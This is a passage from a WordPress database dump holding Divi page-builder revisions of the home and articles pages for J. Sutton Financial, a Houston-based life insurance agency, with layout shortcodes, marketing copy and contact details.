_builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" _dynamic_attributes=\"button_one_url\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"77px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"99.9%\" custom_margin=\"|-14px||||\" custom_padding=\"8px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" hover_enabled=\"0\" global_colors_info=\"{}\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" _dynamic_attributes=\"button_one_url\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_style=\"fade\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on|||#f9f9f9|dotted\" link_text_color=\"#f9f9f9\" background_layout=\"dark\" custom_margin=\"12px|||||\" custom_padding=\"0px|0px|0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\">340 North Sam Houston Parkway East<br />Houston, TX 77060<br /><a href=\"mailto:info@JSuttonFinancial.com\">info@JSuttonFinancial.com</a><br /><a href=\"tel:713-254-3439\">(713) 254-3439</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" link_font=\"||||on||||dotted\" link_text_align=\"center\" link_text_color=\"#FFFFFF\" text_orientation=\"center\" background_layout=\"dark\" min_height=\"24.8px\" custom_margin=\"||66px|||\" link_option_url_new_window=\"on\" global_colors_info=\"{}\"]<p>©2023 J. Sutton Financial | All Rights Reserved | <a href=\"/insurance-quote/\" target=\"_blank\" rel=\"noopener\">Privacy Policy</a></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-04-02 19:00:32','2023-04-02 19:00:32','',138,'http://cmdev-site1.com/?p=614',0,'revision','',0),(615,1,'2023-04-02 19:02:58','2023-04-02 19:02:58','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px|||||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"J. Sutton Financial Articles\" color=\"#003372\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_color=\"#003372\" custom_margin=\"24px|||||\" global_colors_info=\"{}\"][/dsm_text_divider][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" custom_margin=\"15px|||||\" custom_padding=\"||31px|||\" global_colors_info=\"{}\"]<p style=\"font-weight: 400;\">Our resource articles are created to empower you with knowledge about insurance-related products, protection, prevention, and much more. Our hope is to educate our readers so you can feel confident when discussing insurance options – everything you read is unbiased and not specific to J. Sutton Financial policies.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-13px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-85px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"9\" include_categories=\"all\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" read_more_font=\"|700|||on|||#003372|dotted\" read_more_text_color=\"#003372\" read_more_font_size=\"16px\" pagination_font=\"||||on|||#000000|dotted\" pagination_text_color=\"#003372\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','publish','closed','closed','','articles','','','2023-04-10 13:15:21','2023-04-10 13:15:21','',0,'http://cmdev-site1.com/?page_id=615',0,'page','',0),(616,1,'2023-04-02 19:02:08','2023-04-02 19:02:08','','Auto Draft','','inherit','closed','closed','','615-revision-v1','','','2023-04-02 19:02:08','2023-04-02 19:02:08','',615,'http://cmdev-site1.com/?p=616',0,'revision','',0),(618,1,'2023-04-02 19:02:58','2023-04-02 19:02:58','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_blog _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" include_categories=\"all\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Auto Draft','','inherit','closed','closed','','615-revision-v1','','','2023-04-02 19:02:58','2023-04-02 19:02:58','',615,'http://cmdev-site1.com/?p=618',0,'revision','',0),(619,1,'2023-04-02 19:03:02','2023-04-02 19:03:02','[et_pb_section fb_built=\"1\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\"][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"4_4\" theme_builder_area=\"post_content\"][et_pb_blog _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" include_categories=\"all\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','inherit','closed','closed','','615-revision-v1','','','2023-04-02 19:03:02','2023-04-02 19:03:02','',615,'http://cmdev-site1.com/?p=619',0,'revision','',0),(620,1,'2023-04-02 19:04:30','2023-04-02 19:04:30','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_text_divider header=\"Articles\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" color=\"#003372\" sticky_enabled=\"0\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"-13px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"-85px|auto||auto||\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog include_categories=\"all\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','inherit','closed','closed','','615-revision-v1','','','2023-04-02 19:04:30','2023-04-02 19:04:30','',615,'http://cmdev-site1.com/?p=620',0,'revision','',0),(658,3,'2023-04-03 11:59:24','2023-04-03 11:59:24','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px||0px|||\" global_colors_info=\"{}\"][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-13px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-85px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" include_categories=\"all\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" read_more_font=\"|700|||on|||#003372|dotted\" read_more_text_color=\"#003372\" read_more_font_size=\"16px\" pagination_font=\"||||on|||#000000|dotted\" pagination_text_color=\"#003372\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','inherit','closed','closed','','615-revision-v1','','','2023-04-03 11:59:24','2023-04-03 11:59:24','',615,'http://cmdev-site1.com/?p=658',0,'revision','',0),(655,3,'2023-04-03 11:56:53','2023-04-03 11:56:53','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_text_divider header=\"Articles\" color=\"#003372\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" global_colors_info=\"{}\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-13px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-85px|auto||auto||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" include_categories=\"all\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" read_more_font=\"|700|||on|||#003372|dotted\" read_more_text_color=\"#003372\" read_more_font_size=\"16px\" pagination_font=\"||||on|||#000000|dotted\" pagination_text_color=\"#003372\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','inherit','closed','closed','','615-revision-v1','','','2023-04-03 11:56:53','2023-04-03 11:56:53','',615,'http://cmdev-site1.com/?p=655',0,'revision','',0),(621,1,'2023-04-02 19:07:35','2023-04-02 19:07:35','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"200.8px\" custom_margin=\"-14px|||||\" custom_padding=\"66px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"||66px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][dsm_text_divider header=\"Articles\" divider_style=\"dotted\" divider_weight=\"3px\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" header_text_color=\"#000000\" header_font_size=\"30px\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" color=\"#003372\" sticky_enabled=\"0\"][/dsm_text_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"-13px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" custom_margin=\"-85px|auto||auto||\" sticky_enabled=\"0\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog include_categories=\"all\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" fullwidth=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" sticky_enabled=\"0\" pagination_font=\"||||on|||#000000|dotted\" pagination_text_color=\"#003372\" read_more_text_color=\"#003372\" read_more_font=\"|700|||on|||#003372|dotted\" read_more_font_size=\"16px\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section]','Articles','','inherit','closed','closed','','615-revision-v1','','','2023-04-02 19:07:35','2023-04-02 19:07:35','',615,'http://cmdev-site1.com/?p=621',0,'revision','',0),(636,1,'2023-04-02 19:31:57','2023-04-02 19:31:57','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" dropdown_menu_line_color=\"#003372\" dropdown_menu_active_link_color=\"#003372\" logo=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" logo_width=\"15%\" dropdown_menu_line_color_tablet=\"#003372\" dropdown_menu_line_color_phone=\"#003372\" dropdown_menu_line_color_last_edited=\"on|desktop\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" module_alignment=\"left\" custom_margin=\"-43px|||0px|false|false\" custom_padding=\"|||0px|false|false\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_align=\"center\" global_colors_info=\"{}\"]<h1><span style=\"color: #ffffff;\">J. Sutton Financial, an Independent Agency for American Income Life Insurance Company </span></h1>[/et_pb_text][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" text_orientation=\"center\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url,button_two_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|37px||89px||\" custom_padding=\"33px|1px||||\" animation_style=\"roll\" animation_direction=\"left\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|-20px||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||-17px||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjI2In19@\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#FFFFFF\" button_one_bg_color=\"#666666\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" width=\"100%\" max_width=\"100%\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_typing_effect typing_effect=\"How much insurance do you need?\" typing_speed=\"150ms\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_level=\"h2\" header_text_align=\"center\" before_text_align=\"center\" global_colors_info=\"{}\"][/dsm_typing_effect][dsm_button button_one_text=\"Get a quote today!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#ffffff\" button_one_bg_color=\"#003372\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" button_one_icon=\"&#x77;||divi||400\" button_one_icon_color=\"#FFFFFF\" background_layout=\"dark\" hover_enabled=\"0\" box_shadow_style_button_one=\"preset2\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(224,219,219,0.39)\" custom_margin=\"66px|||||\" custom_padding=\"1px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"10px|auto||auto||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_one_url=\"@ET-DC@eyJkeW5hbWljIjp0cnVlLCJjb250ZW50IjoicG9zdF9saW5rX3VybF9wYWdlIiwic2V0dGluZ3MiOnsicG9zdF9pZCI6IjM4In19@\" button_alignment=\"center\" _builder_version=\"4.20.2\" _dynamic_attributes=\"button_one_url\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||0px||\" custom_padding=\"|||0px||\" animation_direction=\"left\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_margin=\"-11px|||||\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||141px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_2_text_color=\"#FFFFFF\" custom_margin=\"30px||||false|false\" custom_padding=\"148px||66px||false|false\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\">Proudly Headquartered in Houston, Texas</h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" height=\"148px\" custom_margin=\"-20px|auto||auto|false|false\" custom_padding=\"66px||66px||false|false\" global_colors_info=\"{}\"][et_pb_column type=\"2_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/j-sutton-logo-white-no-background.png\" title_text=\"j sutton logo white no background\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"46.1%\" custom_margin=\"|188px||188px||true\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"4.20.2\" _module_preset=\"default\" 